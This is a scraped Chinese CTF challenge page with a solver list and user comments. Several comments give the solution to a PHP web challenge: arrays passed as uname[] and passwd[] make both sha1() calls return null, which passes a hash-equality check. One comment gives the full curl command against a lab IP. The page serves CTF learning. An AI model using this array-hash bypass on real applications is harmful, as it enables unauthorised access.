评分(3)
解题动态
17530626785 攻破了该题 3小时前
AAxiao 攻破了该题 5小时前
24030111073 攻破了该题 22小时前
DURUI 攻破了该题 22小时前
dgreawSFD 攻破了该题 1天前
Xlj15562926857 攻破了该题 2天前
freedom20060505 攻破了该题 2天前
ttmtmy01 攻破了该题 2天前
0x2d3CN 攻破了该题 2天前
小狗stone 攻破了该题 2天前
PinkJess 攻破了该题 2天前
小坑西1 攻破了该题 2天前
17632087155 攻破了该题 2天前
Gyro 攻破了该题 2天前
LHkqj 攻破了该题 3天前
besty2k 攻破了该题 3天前
shai 攻破了该题 3天前
SoulTower 攻破了该题 3天前
Fran 攻破了该题 4天前
评论
Epiphany777 2年前
举报
uname!=passwd 但 sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin') http://114.67.175.224:10336/?uname[]=1&id=margin passwd[]=2
snickerX 2年前
举报
有点小复杂,加上hackbar收费了,建议postman
HuangYanQwQ 2年前
举报
hackbarV2免费
Licapule 2年前
举报
burpsuite 得不到flag,实在找不到别的方法可以直接在控制台用AJAX
Inf0 2年前
举报
rnm 退钱
yafoolaw 2年前
举报
返回404,是不是可以退钱
树木有点绿 2年前
举报
easy
tangfan668 3年前
举报
用BP确实不可以,不知道是BP软件有问题,还是这个环境有问题。使用在线hacker工具,使用POST传参,在URL里面传递id=margin&uname[]=a 在body里面传输passwd[]=b,就可以得到flag,利用的原理是数组函数无法做hash,数组hash都为null。
哈密顽石 3年前
举报
bp同时传递get 和post 包没改对,结果没出来。直接使用hackbar 一次出来。
狐萝卜CarroT 3年前
举报
挺奇怪的,一样的payload,用burp提交就没回显,用浏览器提交就回显flag。
rocku1981 3年前
举报
curl "http://114.67.246.176:18393/?uname[]=1&id=margin" -d "passwd[]=2" -g